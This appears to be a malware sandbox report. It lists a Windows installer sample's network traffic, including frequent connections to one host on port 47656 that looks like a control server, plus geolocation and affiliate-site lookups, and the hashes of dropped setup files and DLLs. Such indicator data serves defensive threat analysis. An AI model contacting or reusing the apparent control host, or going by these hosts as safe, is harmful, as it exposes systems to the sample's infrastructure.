US 157.230.187.97:47656 tcp
US 54.70.101.211:443 api.rewards.brave.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 ads-serve.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 ads-serve.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.72.89:80 lumtest.com tcp
US 8.8.8.8:53 graph.facebook.com udp
US 157.240.22.19:443 graph.facebook.com tcp
US 8.8.8.8:53 ads-static.brave.com udp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 api.rewards.brave.com udp
NL 65.9.83.97:443 go-updater.brave.com tcp
US 54.70.101.211:443 api.rewards.brave.com tcp
NL 65.9.83.84:443 ads-static.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 ads-serve.brave.com tcp
US 8.8.8.8:53 lumtest.com udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 go-updater.brave.com udp
US 3.94.72.89:80 lumtest.com tcp
US 208.95.112.1:80 ip-api.com tcp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 8.8.8.8:53 grant.rewards.brave.com udp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 ads-serve.brave.com udp
US 157.230.187.97:47656 tcp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 151.101.2.137:443 ads-serve.brave.com tcp
US 151.101.2.137:443 ads-serve.brave.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 safebrowsing.brave.com udp
US 151.101.2.137:443 safebrowsing.brave.com tcp
US 8.8.8.8:53 ads-static.brave.com udp
NL 65.9.83.119:443 ads-static.brave.com tcp
US 151.101.2.137:443 safebrowsing.brave.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 api.homeadvisor.com udp
US 104.16.124.55:443 api.homeadvisor.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 cozeros.com udp
FI 95.217.229.116:80 cozeros.com tcp
US 8.8.8.8:53 ads-static.brave.com udp
US 8.8.8.8:53 ads-serve.brave.com udp
NL 65.9.83.119:443 ads-static.brave.com tcp
US 151.101.2.137:443 ads-serve.brave.com tcp
NL 65.9.83.97:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ads-serve.brave.com udp
US 151.101.2.137:443 ads-serve.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 go-updater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
NL 65.9.83.96:443 go-updater.brave.com tcp
NL 65.9.83.25:443 go-updater.brave.com tcp
NL 65.9.83.119:443 ads-static.brave.com tcp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 8.8.8.8:53 ads-serve.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
NL 65.9.83.119:443 ads-static.brave.com tcp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 8.8.8.8:53 servicemagic.sc.omtrdc.net udp
FR 15.236.176.210:443 servicemagic.sc.omtrdc.net tcp
US 8.8.8.8:53 api.homeadvisor.com udp
US 104.16.124.55:443 api.homeadvisor.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 graph.facebook.com udp
NL 31.13.64.16:443 graph.facebook.com tcp
US 8.8.8.8:53 api.pushio.com udp
US 8.8.8.8:53 graph.facebook.com udp
US 8.8.8.8:53 graph.facebook.com udp
US 8.8.8.8:53 firebase-settings.crashlytics.com udp
NL 31.13.64.16:443 graph.facebook.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
US 8.8.8.8:53 device-provisioning.googleapis.com udp
US 8.8.8.8:53 api.pushio.com udp
NL 213.227.135.209:443 purifydigital.go2affise.com tcp
NL 142.250.179.131:443 firebase-settings.crashlytics.com tcp
US 8.8.8.8:53 ca.iadsdk.apple.com udp
NL 142.250.179.202:443 device-provisioning.googleapis.com tcp
US 157.230.187.97:47656 tcp
IE 34.248.156.174:443 dpm.demdex.net tcp
NL 31.13.64.16:443 graph.facebook.com tcp
NL 23.216.254.44:443 api.pushio.com tcp
NL 23.216.254.44:443 api.pushio.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 api.homeadvisor.com udp
US 8.8.8.8:53 api.homeadvisor.com udp
NL 104.80.228.138:443 ca.iadsdk.apple.com tcp
US 104.16.123.55:443 api.homeadvisor.com tcp
US 104.16.124.55:443 api.homeadvisor.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 api.mixpanel.com udp
US 35.190.25.25:443 api.mixpanel.com tcp
US 8.8.8.8:53 mobile-collector.newrelic.com udp
US 151.101.2.137:443 mobile-collector.newrelic.com tcp
US 8.8.8.8:53 app.adjust.com udp
US 8.8.8.8:53 inappcheck.itunes.apple.com udp
DE 185.151.204.13:443 app.adjust.com tcp
NL 96.16.53.203:443 inappcheck.itunes.apple.com tcp
FR 2.16.118.172:443 s.mzstatic.com tcp
US 8.8.8.8:53 api.pushio.com udp
US 157.230.187.97:47656 tcp
NL 142.250.179.202:443 device-provisioning.googleapis.com tcp
NL 23.216.254.44:443 api.pushio.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 servicemagic.sc.omtrdc.net udp
FR 13.36.218.177:443 servicemagic.sc.omtrdc.net tcp
US 8.8.8.8:53 api.pushio.com udp
NL 23.216.254.44:443 api.pushio.com tcp
US 8.8.8.8:53 api2.branch.io udp
US 157.230.187.97:47656 tcp
NL 65.9.83.50:443 api2.branch.io tcp
US 8.8.8.8:53 variations.brave.com udp
NL 65.9.83.54:443 variations.brave.com tcp
US 8.8.8.8:53 ca.iadsdk.apple.com udp
US 157.230.187.97:47656 tcp
NL 104.80.228.138:443 ca.iadsdk.apple.com tcp
US 8.8.8.8:53 api.homeadvisor.com udp
US 104.16.123.55:443 api.homeadvisor.com tcp
US 8.8.8.8:53 api.rewards.brave.com udp
US 54.70.101.211:443 api.rewards.brave.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 graph.facebook.com udp
US 31.13.71.1:443 graph.facebook.com tcp
GB 157.240.240.17:443 graph.facebook.com tcp
US 8.8.8.8:53 graph.facebook.com udp
NL 31.13.64.16:443 graph.facebook.com tcp
US 8.8.8.8:53 grant.rewards.brave.com udp
US 151.101.2.137:443 grant.rewards.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 graph.facebook.com udp
US 157.240.22.19:443 graph.facebook.com tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.72.89:80 lumtest.com tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.72.89:80 lumtest.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 fcmtoken.googleapis.com udp
US 142.251.36.10:443 fcmtoken.googleapis.com tcp
US 8.8.8.8:53 gsp10-ssl.apple.com udp
US 17.142.171.14:443 gsp10-ssl.apple.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 app.adjust.com udp
DE 185.151.204.8:443 app.adjust.com tcp
US 151.101.2.132:443 pt.ispot.tv tcp
US 8.8.8.8:53 api.homeadvisor.com udp
US 104.16.123.55:443 api.homeadvisor.com tcp
US 8.8.8.8:53 365shoppingdays.com udp
US 104.21.46.118:443 365shoppingdays.com tcp
US 8.8.8.8:53 www.bing.com udp
US 8.8.8.8:53 app.adjust.com udp
US 204.79.197.200:443 www.bing.com tcp
US 157.230.187.97:47656 tcp
DE 185.151.204.15:443 app.adjust.com tcp
US 8.8.8.8:53 payfaucet.net udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 172.67.169.223:443 payfaucet.net tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
NL 65.9.83.97:443 go-updater.brave.com tcp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 8.8.8.8:53 splitter.lendingtree.com udp
US 54.84.231.159:443 splitter.lendingtree.com tcp
US 8.8.8.8:53 www.google.nl udp
US 142.251.36.3:443 www.google.nl tcp
US 8.8.8.8:53 oneadscpi.com udp
SG 139.162.10.253:80 oneadscpi.com tcp
US 8.8.8.8:53 play.itunes.apple.com udp
US 8.8.8.8:53 cdn.branch.io udp
NL 104.109.143.159:443 play.itunes.apple.com tcp
NL 65.9.83.39:443 cdn.branch.io tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 sdk.out.usbla.net udp
NL 65.9.83.102:443 sdk.out.usbla.net tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 app.adjust.com udp
US 8.8.8.8:53 api.homeadvisor.com udp
US 104.16.124.55:443 api.homeadvisor.com tcp
US 104.16.124.55:443 api.homeadvisor.com tcp
DE 185.151.204.7:443 app.adjust.com tcp
NL 31.13.64.21:443 connect.facebook.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 app.adjust.com udp
DE 185.151.204.12:443 app.adjust.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 gsp10-ssl.apple.com udp
US 17.142.171.16:443 gsp10-ssl.apple.com tcp
US 157.230.187.97:47656 tcp
NL 65.9.83.84:443 ads-static.brave.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 www.offertoro.com udp
US 50.19.200.145:443 www.offertoro.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 splitter.lendingtree.com udp
US 54.175.233.100:443 splitter.lendingtree.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 8.8.8.8:53 www.lendingtree.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 104.19.147.29:443 www.lendingtree.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 api.homeadvisor.com udp
US 104.16.124.55:443 api.homeadvisor.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.bing.com udp
US 204.79.197.200:443 www.bing.com tcp
US 157.230.187.97:47656 tcp
US 142.251.36.3:443 www.google.nl tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 app.adjust.com udp
DE 185.151.204.7:443 app.adjust.com tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.72.89:80 lumtest.com tcp
US 8.8.8.8:53 ads-serve.brave.com udp
US 151.101.2.137:443 ads-serve.brave.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 s.mzstatic.com udp
US 8.8.8.8:53 api.homeadvisor.com udp
US 104.16.124.55:443 api.homeadvisor.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
FR 2.16.118.172:443 s.mzstatic.com tcp
US 8.8.8.8:53 api.homeadvisor.com udp
US 104.16.124.55:443 api.homeadvisor.com tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.72.89:80 lumtest.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 app.adjust.com udp
DE 185.151.204.15:443 app.adjust.com tcp
US 8.8.8.8:53 www.lendingtree.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 104.19.147.29:443 www.lendingtree.com tcp
US 8.8.8.8:53 stackpath.bootstrapcdn.com udp
US 104.18.10.207:443 stackpath.bootstrapcdn.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 54.197.189.228:443 splitter.lendingtree.com tcp
US 104.16.19.94:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 discover.upland.me udp
US 104.22.15.201:443 discover.upland.me tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 lumtest.com udp
US 157.230.187.97:47656 tcp
US 3.94.72.89:80 lumtest.com tcp
US 8.8.8.8:53 play.itunes.apple.com udp
NL 104.109.143.159:443 play.itunes.apple.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 104.16.85.20:443 cdn.jsdelivr.net tcp
US 8.8.8.8:53 ajax.googleapis.com udp
NL 142.250.179.202:443 ajax.googleapis.com tcp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 104.16.19.94:443 cdnjs.cloudflare.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 www.lendingtree.com udp
US 8.8.8.8:53 get.roundlyx.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 151.101.2.159:443 get.roundlyx.com tcp
US 104.19.146.29:443 www.lendingtree.com tcp
US 157.230.187.97:47656 tcp
US 199.60.103.225:443 promo.upland.me tcp
US 8.8.8.8:53 stoic.ai udp
GB 185.215.4.66:443 stoic.ai tcp
US 157.230.187.97:47656 tcp
US 104.19.147.29:443 www.lendingtree.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 nexo.io udp
US 104.22.1.234:443 nexo.io tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
FI 95.217.229.116:80 cozeros.com tcp
US 8.8.8.8:53 p3a.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 p3a.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.40.55:80 lumtest.com tcp
US 8.8.8.8:53 ajax.cloudflare.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 104.16.167.35:443 ajax.cloudflare.com tcp
US 8.8.8.8:53 static.offertoro.com udp
NL 65.9.83.15:443 static.offertoro.com tcp
US 8.8.8.8:53 static.tildacdn.com udp
DE 151.236.71.44:443 static.tildacdn.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 firebaselogging-pa.googleapis.com udp
US 172.217.168.202:443 firebaselogging-pa.googleapis.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
NL 17.253.53.201:443 cl4.apple.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 purifydigital.go2affise.com udp
NL 213.227.135.209:443 purifydigital.go2affise.com tcp
US 8.8.8.8:53 static.tildacdn.com udp
US 8.8.8.8:53 my.lendingtree.com udp
US 157.230.187.97:47656 tcp
US 104.19.146.29:443 my.lendingtree.com tcp
NL 65.9.83.105:443 static.offertoro.com tcp
US 8.8.8.8:53 static.offertoro.com udp
NL 65.9.83.15:443 static.offertoro.com tcp
US 8.8.8.8:53 static.offertoro.com udp
NL 65.9.83.15:443 static.offertoro.com tcp
DE 151.236.71.107:443 static.tildacdn.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 104.19.255.88:443 app.termly.io tcp
US 8.8.8.8:53 p3a.brave.com udp
US 151.101.2.137:443 p3a.brave.com tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.40.55:80 lumtest.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 unpkg.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 104.16.125.175:443 unpkg.com tcp
US 8.8.8.8:53 p3a.brave.com udp
US 151.101.2.137:443 p3a.brave.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 8.8.8.8:53 p3a.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 p3a.brave.com tcp
US 151.101.2.137:443 p3a.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 365shoppingdays.com udp
US 172.67.168.120:443 365shoppingdays.com tcp
US 8.8.8.8:53 my.lendingtree.com udp
US 104.19.147.29:443 my.lendingtree.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.40.55:80 lumtest.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp

Files

memory/1996-53-0x00000000752D1000-0x00000000752D3000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

memory/1744-55-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

memory/1068-65-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS0D696124\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS0D696124\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS0D696124\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
